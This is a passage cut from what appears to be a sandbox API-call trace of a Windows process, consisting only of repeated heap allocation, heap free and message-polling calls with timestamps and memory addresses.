hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.351] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.351] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.351] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.352] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.352] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed268 | out: hHeap=0x770000) returned 1 [0026.352] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.352] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4d8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.353] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed268 [0026.353] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0026.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.354] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.355] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.355] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.355] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.356] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.357] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) 